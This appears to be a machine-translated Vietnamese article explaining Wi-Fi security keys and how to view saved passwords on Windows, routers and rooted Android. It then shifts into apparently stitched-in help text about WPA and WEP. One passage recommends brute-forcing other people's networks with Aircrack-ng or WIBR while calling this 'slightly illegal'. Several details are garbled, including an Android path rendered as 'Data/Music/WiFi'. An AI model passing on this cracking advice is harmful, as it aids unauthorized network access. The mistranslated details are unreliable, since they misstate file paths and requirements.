Bất kỳ người dùng nào cũng biết rằng khi cố gắng kết nối với mạng không dây an toàn, họ thường nhận được thông báo “Nhập khóa bảo mật mạng của bạn”. Đây là loại khóa gì, tại sao cần thiết, cách sử dụng, tìm nó ở đâu và cách xác định nó bằng nhiều phương pháp khác nhau sẽ được thảo luận thêm. Trên thực tế, mọi người dùng đều đã biết nó là gì, nhưng có lẽ họ chỉ đơn giản là không biết về tình trạng thực sự của sự việc. Trên thực tế, sau khi đọc tài liệu được trình bày bên dưới, bất kỳ người dùng nào sẽ không còn có bất kỳ câu hỏi nào liên quan đến việc hiểu chính thuật ngữ này và các phương pháp được sử dụng để xác định khóa đó.

Khóa bảo mật mạng nói chung là gì?

Vậy, hiểu thuật ngữ này là gì? Nếu ai chưa biết thì tính bảo mật của mạng không dây được đảm bảo bằng cách bảo vệ khỏi truy cập trái phép vào mạng và mã hóa dữ liệu được truyền và nhận.

Đồng thời, khái niệm khóa không liên quan đến loại mã hóa được sử dụng mà đề cập cụ thể đến việc đảm bảo mục nhập an toàn. Như nhiều người có thể đã đoán, câu hỏi khóa bảo mật mạng là gì chỉ có một câu trả lời đúng: đây là mật khẩu truy cập phổ biến nhất, được nhập khi được bộ định tuyến nhắc. Nó có thể bao gồm bất kỳ tập hợp các chữ cái, số và ký hiệu Latin nào.

Làm thế nào nó hoạt động?

Trong câu hỏi khóa bảo mật mạng là gì, chúng ta không thể bỏ qua một số khía cạnh liên quan đến cách thức hoạt động của nó. Thực tế là yêu cầu không đến từ chính mạng không dây mà từ bộ định tuyến được sử dụng (bộ định tuyến hoặc modem ADSL).

Khi bạn cố gắng kết nối với mạng được xác định bởi máy tính, máy tính xách tay hoặc thiết bị di động của bạn, một yêu cầu sẽ được đưa ra từ thiết bị và được ghi lại trên bộ định tuyến. Đổi lại, nó đảm bảo tính bảo mật của mạng không dây và cung cấp cho bạn một loại lời mời kết nối, nhưng với việc xác nhận bắt buộc về mật khẩu truy cập, trong hầu hết các trường hợp, ngoại trừ việc sử dụng các chương trình cho phép bạn tính toán khóa, sẽ cung cấp khả năng bảo vệ. chống lại kết nối trái phép. Chúng ta sẽ xem xét các chương trình sau, nhưng bây giờ hãy xem cách bạn có thể tìm ra mật khẩu như vậy trong các hệ thống khác nhau và trên các thiết bị khác nhau.

Làm cách nào để tìm ra khóa bảo mật mạng trong Windows?

Và trước tiên, hãy xem xét hệ điều hành máy tính để bàn Windows liên quan đến những người dùng vì lý do nào đó đã quên hoặc mất mật khẩu Wi-Fi của họ. Phải làm gì nếu máy tính hoặc máy tính xách tay kết nối mạng mà không gặp sự cố nhưng bạn cần truy cập mạng từ một thiết bị khác (ví dụ: từ thiết bị di động). Tôi có thể lấy khóa bảo mật mạng ở đâu? Vấn đề này có thể được giải quyết khá đơn giản.

Trước tiên, bạn cần đi đến các thuộc tính của kết nối đã thiết lập bằng Trung tâm Mạng và Chia sẻ. Bạn có thể gọi nó thông qua menu RMB trên biểu tượng kết nối hoặc đi đến phần tương ứng thông qua “Bảng điều khiển”. Cửa sổ thuộc tính sử dụng tab bảo mật, chứa tên mạng và mật khẩu. Nhưng nó chỉ được hiển thị dưới dạng dấu chấm. Làm thế nào để tìm ra khóa bảo mật mạng? Có, chỉ cần đánh dấu vào ô bên cạnh mục hiển thị các ký tự đã nhập và mật khẩu sẽ hiện ra trước mắt bạn.

Tại sao chuyện này đang xảy ra? Có, chỉ vì bất kỳ hệ điều hành nào, ngay cả với kết nối một lần, đều lưu tên và mật khẩu mạng đã nhập cho chúng, chưa kể kết nối được sử dụng theo mặc định.

Lấy chìa khóa trên bộ định tuyến

Về nguyên tắc, nếu tùy chọn này không phù hợp với người dùng vì lý do nào đó, bạn có thể thực hiện một lộ trình dài hơn bằng cách sử dụng giao diện web của bộ định tuyến để có được nó. Để thực hiện việc này, bạn cần nhập cài đặt thông qua bất kỳ trình duyệt web nào bằng cách nhập các kết hợp bắt đầu bằng 192.168, sau đó thêm 0,1 hoặc 1,1 (đối với các kiểu bộ định tuyến không chuẩn, địa chỉ có thể khác nhau khá đáng kể).

Sau đó, đi tới phần Kết nối không dây, rồi trong tiểu mục Bảo mật, tìm trường có nhãn PSK. Những gì được viết trong đó chính là chìa khóa bạn đang tìm kiếm. Nếu vì lý do nào đó mà bạn không thể vào cài đặt bộ định tuyến, hãy nhập tổ hợp ipconfig trên dòng lệnh và tìm trong trường cổng mặc định. Đây là địa chỉ của chính bộ định tuyến.

Xác định khóa bảo mật trong Android

Chúng tôi đã tìm ra khóa bảo mật mạng là gì và cách tìm ra khóa đó trong Windows. Bây giờ hãy xem cách thực hiện các quy trình tương tự trên hệ thống di động Android. Mọi thứ ở đây phức tạp hơn một chút.

Nếu mật khẩu không hiển thị bình thường trong cài đặt kết nối, bạn sẽ phải tìm nó trong các tệp hệ thống, nhưng để truy cập chúng trên thiết bị, bạn cần có quyền Root và bất kỳ trình quản lý tệp nào. Trong trình quản lý, lần lượt đi qua các thư mục Dữ liệu/Âm nhạc/WiFi và trong phần sau, mở một tài liệu văn bản có tên wpa_supplicant.conf, sau đó tìm tên của mạng bạn đang tìm kiếm trong văn bản. Key tương ứng sẽ được viết bên cạnh tên.

Sử dụng các chương trình chuyên dụng

Trên hệ thống di động, bạn có thể sử dụng tiện ích WiFi Mật khẩu Hacker miễn phí, sau khi khởi chạy, tiện ích này sẽ quét tất cả các kết nối từng được thực hiện và sau khi chọn mạng mong muốn, sẽ hiển thị mật khẩu truy cập được sử dụng cho mạng đó trên màn hình.

Nếu bạn cần tìm ra mật khẩu mạng của người khác, bạn sẽ phải sử dụng một kỹ thuật hơi bất hợp pháp được gọi là vũ phu. Đối với hệ thống Windows, tiện ích phù hợp nhất là Aircrack-ng và đối với hệ thống Android - WIBR. Việc sử dụng chúng khá đơn giản nên không có ích gì khi tập trung quá nhiều vào việc này. Nhưng hãy nhớ rằng việc sử dụng chúng, nếu không phải là bất hợp pháp, thì ít nhất cũng vượt quá giới hạn của phép lịch sự.

Thay vì tổng cộng

Đó là tất cả để xem xét các vấn đề liên quan đến khái niệm khóa bảo mật. Về bản thân khái niệm này, chỉ có thể rút ra một kết luận - đây là mật khẩu truy cập phổ biến nhất. Về cách nhận biết nó, tôi nghĩ không nên có bất kỳ câu hỏi đặc biệt nào ở đây, vì việc này được thực hiện khá đơn giản trong bất kỳ hệ điều hành nào. Có thể xảy ra sự cố với thiết bị di động nếu bạn không có quyền truy cập vào các thư mục hệ thống, nhưng để có được các quyền thích hợp, bạn có thể sử dụng, chẳng hạn như tiện ích máy tính Kingo Root, được cài đặt lần đầu trên PC, sau đó cài đặt tiện ích của riêng nó. driver trên thiết bị di động, sau đó bạn sẽ có quyền superuser.

Dữ liệu cá nhân và các tập tin nằm trên mạng không dây đôi khi có thể được nhìn thấy bởi những người nhận tín hiệu vô tuyến của mạng của bạn. Điều này có thể dẫn đến việc đánh cắp danh tính và các hoạt động độc hại khác.

Khóa hoặc cụm mật khẩu bảo mật mạng sẽ giúp bảo vệ mạng không dây của bạn khỏi sự truy cập trái phép như vậy.

Trình hướng dẫn cài đặt mạng sẽ giúp bạn cài đặt khóa bảo mật mạng.

Ghi chú Lưu ý: Không nên sử dụng Quyền riêng tư tương đương có dây (WEP) như một cách để bảo mật mạng không dây của bạn. Công nghệ truy cập Wi-Fi Protected Access (WPA hoặc WPA2) an toàn hơn. Nếu công nghệ WPA hoặc WPA2 không hoạt động, bạn nên thay bộ điều hợp mạng bằng bộ điều hợp hoạt động với WPA hoặc WPA2. Tất cả các thiết bị mạng, máy tính, bộ định tuyến và điểm truy cập cũng hỗ trợ WPA hoặc WPA2.

Phương pháp mã hóa cho mạng không dây

Hiện tại có ba phương thức mã hóa cho mạng không dây: Truy cập được bảo vệ Wi-Fi (WPA và WPA2), Quyền riêng tư tương đương có dây (WEP) và 802.1x. Hai phương pháp đầu tiên được mô tả chi tiết hơn dưới đây. 802.1x, thường được sử dụng cho mạng công ty, không được đề cập trong phần này.

Công nghệ truy cập được bảo vệ Wi-Fi (WPA và WPA2)

Để kết nối bằng WPA và WPA2, bạn phải có khóa bảo mật. Sau khi khóa được xác minh, tất cả dữ liệu được gửi giữa máy tính hoặc thiết bị của bạn và điểm truy cập sẽ được mã hóa.

Có hai loại xác thực WPA: WPA và WPA2. Sử dụng WPA2 bất cứ khi nào có thể vì nó an toàn nhất. Hầu như tất cả các bộ điều hợp không dây mới đều hỗ trợ WPA và WPA2, nhưng có một số mẫu cũ hơn không hỗ trợ chúng.

WPA-Personal và WPA2-Personal cung cấp cho người dùng cùng một cụm mật khẩu. Những loại này được khuyến khích sử dụng trong mạng gia đình. WPA-Enterprise và WPA2-Enterprise được thiết kế để sử dụng với máy chủ xác thực 802.1x, tạo ra một khóa khác nhau cho mỗi người dùng. Loại này thường được sử dụng trong các mạng làm việc.

Giao thức bảo mật tương đương có dây (WEP)

WEP là phương thức bảo mật mạng thế hệ trước vẫn có sẵn và hỗ trợ các mẫu thiết bị cũ hơn, nhưng không nên sử dụng nó. Khi kích hoạt WEP, bạn phải cấu hình khóa bảo mật mạng. Khóa mã hóa này được gửi qua mạng từ máy tính này sang máy tính khác. Tuy nhiên, bảo mật WEP tương đối dễ bị phá vỡ.

Có hai loại WEP: xác thực hệ thống mở và xác thực khóa chung. Không có cách nào trong số đó là hoàn toàn an toàn, nhưng xác thực khóa dùng chung là loại kém an toàn nhất.

Đối với hầu hết các máy tính và điểm truy cập không dây, khóa xác thực công khai giống với khóa mã hóa WEP tĩnh được sử dụng để bảo mật mạng. Kẻ tấn công có thể chặn thông báo xác thực khóa chia sẻ thành công và sử dụng các công cụ đánh hơi để xác định khóa xác thực dùng chung và khóa mã hóa WEP tĩnh.

Khi khóa mã hóa WEP tĩnh được xác định, kẻ tấn công sẽ có toàn quyền truy cập vào mạng. Vì lý do này, phiên bản Windows này không hỗ trợ cấu hình mạng tự động bằng xác thực khóa chia sẻ WEP.

Nếu, bất chấp những cảnh báo này, bạn vẫn muốn thiết lập xác thực WEP bằng khóa chung, bạn có thể làm như vậy bằng cách làm theo các bước sau.

Tạo hồ sơ bằng xác thực WEP khóa chung

  1. Mở cửa sổ Trung tâm Mạng và Chia sẻ.
  2. Nhấp chuột Thiết lập một kết nối mới hoặc mạng.
  3. Lựa chọn Kết nối thủ công với mạng không dây và nhấp vào Tiếp theo.
  4. Trên trang Nhập thông tin về mạng không dây bạn muốn thêm dưới tiêu đề Loại bảo vệ chọn WEP.
  5. Hoàn thành các trang còn lại và nhấp vào Tiếp theo.
  6. Nhấp chuột Kết nối cập nhật.
  7. Chuyển đến tab Sự an toàn, trong danh sách Loại bảo vệ lựa chọn Tổng quan.
  8. Bấm vào đồng ý.